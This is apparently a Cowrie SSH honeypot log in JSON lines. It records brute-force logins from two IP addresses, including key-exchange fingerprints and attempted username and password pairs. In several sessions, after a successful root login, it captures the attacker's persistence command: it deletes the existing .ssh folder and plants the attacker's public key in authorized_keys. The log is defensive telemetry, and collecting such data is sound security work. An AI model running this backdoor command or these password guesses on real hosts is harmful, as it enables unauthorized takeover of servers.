{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:12:55.801696Z","src_ip":"212.227.235.229","session":"7c796d9ee31f"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456","message":"login attempt [tomcat/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:12:56.924721Z","src_ip":"212.227.235.229","session":"7c796d9ee31f"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:12:58.197518Z","src_ip":"212.227.235.229","session":"7c796d9ee31f"}
{"eventid":"cowrie.login.failed","username":"test4","password":"password","message":"login attempt [test4/password] failed","sensor":"my-vps","timestamp":"2025-08-31T06:13:00.350505Z","src_ip":"212.227.235.229","session":"bd3d4093593b"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:13:02.097619Z","src_ip":"212.227.235.229","session":"bd3d4093593b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45990,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae6b6cd1f34c","protocol":"ssh","message":"New connection: 212.227.235.229:45990 (1.2.3.4:22) [session: ae6b6cd1f34c]","sensor":"my-vps","timestamp":"2025-08-31T06:13:04.884635Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:13:04.885650Z","src_ip":"212.227.235.229","session":"ae6b6cd1f34c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:13:05.161478Z","src_ip":"212.227.235.229","session":"ae6b6cd1f34c"}
{"eventid":"cowrie.login.success","username":"root","password":"P4$$w0rd$","message":"login attempt [root/P4$$w0rd$] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:13:06.306094Z","src_ip":"212.227.235.229","session":"ae6b6cd1f34c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:13:06.879308Z","src_ip":"212.227.235.229","session":"ae6b6cd1f34c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:13:06.880040Z","src_ip":"212.227.235.229","session":"ae6b6cd1f34c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:13:06.881315Z","src_ip":"212.227.235.229","session":"ae6b6cd1f34c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:13:07.158165Z","src_ip":"212.227.235.229","session":"ae6b6cd1f34c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:13:07.778735Z","src_ip":"212.227.235.229","session":"ae6b6cd1f34c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:13:07.779618Z","src_ip":"212.227.235.229","session":"ae6b6cd1f34c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:13:08.057884Z","src_ip":"212.227.235.229","session":"ae6b6cd1f34c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:13:08.059042Z","src_ip":"212.227.235.229","session":"ae6b6cd1f34c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46994,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f876c93451d","protocol":"ssh","message":"New connection: 212.227.235.229:46994 (1.2.3.4:22) [session: 9f876c93451d]","sensor":"my-vps","timestamp":"2025-08-31T06:13:08.332970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:13:08.333892Z","src_ip":"212.227.235.229","session":"9f876c93451d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:13:08.610862Z","src_ip":"212.227.235.229","session":"9f876c93451d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:13:09.756719Z","src_ip":"212.227.235.229","session":"9f876c93451d"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:13:11.037100Z","src_ip":"212.227.235.229","session":"9f876c93451d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47978,"dst_ip":"1.2.3.4","dst_port":22,"session":"8dece885d532","protocol":"ssh","message":"New connection: 212.227.235.229:47978 (1.2.3.4:22) [session: 8dece885d532]","sensor":"my-vps","timestamp":"2025-08-31T06:13:11.364516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:13:11.365610Z","src_ip":"212.227.235.229","session":"8dece885d532"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:13:11.667617Z","src_ip":"212.227.235.229","session":"8dece885d532"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:13:12.917925Z","src_ip":"212.227.235.229","session":"8dece885d532"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:13:13.195384Z","src_ip":"212.227.235.229","session":"ae6b6cd1f34c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:13:13.221408Z","src_ip":"212.227.235.229","session":"8dece885d532"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49298,"dst_ip":"1.2.3.4","dst_port":22,"session":"97fd5ef105a0","protocol":"ssh","message":"New connection: 212.227.125.160:49298 (1.2.3.4:22) [session: 97fd5ef105a0]","sensor":"my-vps","timestamp":"2025-08-31T06:13:14.555403Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:13:15.290213Z","src_ip":"212.227.125.160","session":"97fd5ef105a0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:13:15.290971Z","src_ip":"212.227.125.160","session":"97fd5ef105a0"}
{"eventid":"cowrie.login.failed","username":"test4","password":"password","message":"login attempt [test4/password] failed","sensor":"my-vps","timestamp":"2025-08-31T06:13:17.719021Z","src_ip":"212.227.125.160","session":"97fd5ef105a0"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:13:19.121443Z","src_ip":"212.227.125.160","session":"97fd5ef105a0"}
{"eventid":"cowrie.session.closed","duration":"37.7","message":"Connection lost after 37.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:13:23.567973Z","src_ip":"212.227.125.160","session":"d8b8e25558e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46778,"dst_ip":"1.2.3.4","dst_port":22,"session":"a52d66c1febd","protocol":"ssh","message":"New connection: 212.227.235.229:46778 (1.2.3.4:22) [session: a52d66c1febd]","sensor":"my-vps","timestamp":"2025-08-31T06:13:25.710146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:13:25.711921Z","src_ip":"212.227.235.229","session":"a52d66c1febd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:13:25.971056Z","src_ip":"212.227.235.229","session":"a52d66c1febd"}
{"eventid":"cowrie.login.success","username":"root","password":"aB123456","message":"login attempt [root/aB123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:13:26.233544Z","src_ip":"212.227.125.160","session":"34cc318058c4"}
{"eventid":"cowrie.login.success","username":"root","password":"As123456.","message":"login attempt [root/As123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:13:27.046315Z","src_ip":"212.227.235.229","session":"a52d66c1febd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58076,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d69be370e8b","protocol":"ssh","message":"New connection: 212.227.235.229:58076 (1.2.3.4:22) [session: 4d69be370e8b]","sensor":"my-vps","timestamp":"2025-08-31T06:13:27.528383Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:13:27.584187Z","src_ip":"212.227.235.229","session":"a52d66c1febd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:13:27.584844Z","src_ip":"212.227.235.229","session":"a52d66c1febd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:13:27.585701Z","src_ip":"212.227.235.229","session":"a52d66c1febd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:13:27.846068Z","src_ip":"212.227.235.229","session":"a52d66c1febd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:13:28.420775Z","src_ip":"212.227.235.229","session":"a52d66c1febd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:13:28.421535Z","src_ip":"212.227.235.229","session":"a52d66c1febd"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:13:28.681803Z","src_ip":"212.227.235.229","session":"a52d66c1febd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:13:28.682638Z","src_ip":"212.227.235.229","session":"a52d66c1febd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47834,"dst_ip":"1.2.3.4","dst_port":22,"session":"1dad754efcf3","protocol":"ssh","message":"New connection: 212.227.235.229:47834 (1.2.3.4:22) [session: 1dad754efcf3]","sensor":"my-vps","timestamp":"2025-08-31T06:13:28.934469Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:13:28.936161Z","src_ip":"212.227.235.229","session":"1dad754efcf3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:13:29.190575Z","src_ip":"212.227.235.229","session":"1dad754efcf3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36701,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b44e86444e0","protocol":"ssh","message":"New connection: 212.227.235.229:36701 (1.2.3.4:22) [session: 3b44e86444e0]","sensor":"my-vps","timestamp":"2025-08-31T06:13:29.791393Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:13:29.795457Z","src_ip":"212.227.235.229","session":"3b44e86444e0"}
